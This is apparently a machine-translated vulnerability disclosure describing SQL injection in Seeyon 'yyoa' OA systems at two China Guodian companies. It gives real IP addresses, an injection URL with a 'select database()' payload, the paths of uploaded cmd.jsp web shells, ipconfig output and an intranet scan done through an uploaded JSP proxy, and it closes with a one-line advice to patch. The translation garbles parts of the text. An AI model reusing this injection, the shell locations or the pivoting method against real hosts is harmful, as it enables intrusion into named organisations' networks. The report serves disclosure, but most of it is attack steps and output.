SQL Injection by China Guodian's two companies causes getshell to be updated with patches (involving Intranet Security)

SQL Injection by China Guodian's two companies causes getshell to be updated with patches (involving Intranet Security)

Intranet Security

 

http://60.13.13.239:8080/yyoa/

Http: // 60.13.13.239: 8080/yyoa/common/js/menu/test. jsp? DoType = 101 & S1 = select % 20 database ()
 

No. @ basedir1D: \ Program Files \ UFseeyon \ OA \ mysql \ bin \..\

For more information about the shell method, see
 

WooYun: a bloody case (getshell) caused by a neglected vulnerability in Eastern Airlines media company)

Get shell
 

http://60.13.13.239:8080/yyoa/wel.jsphttp://60.13.13.239:8080/yyoa/cmd.jsp

 

Ipconfig
 

Local Connection of the Ethernet Adapter: connection to a specific DNS suffix .......: Local IPv6 address ........: fe80: 50fc: d4c8: 8aee: b822 % 11 IPv4 address ............: 10.100.130.5 subnet mask ............: 255.255.255.0 Default Gateway .............: 10.100.130.254

Upload a jsp proxy for Intranet Scanning
 

http://10.100.130.4 >> >>Apache-Coyote/1.1 >>Successhttp://10.100.130.5 >> IIS7>>Microsoft-IIS/7.5 >>Successhttp://10.100.130.11 >> >>Microsoft-IIS/6.0 >>Successhttp://10.100.130.12 >> >>Microsoft-IIS/6.0 >>Successhttp://10.100.130.6 >> ???>>Apache >>Successhttp://10.100.130.101 >> ???>>Apache >>Successhttp://10.100.130.253 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Successhttp://10.100.130.252 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success

Some internal document information and logs
 

 

 

 

http://222.89.154.134:8080/yyoa/

Shell address:

Http: // 222.89.154.134: 8080/yyoa/cmd. jsp
 

 

Solution:

Upgrade programs and install patches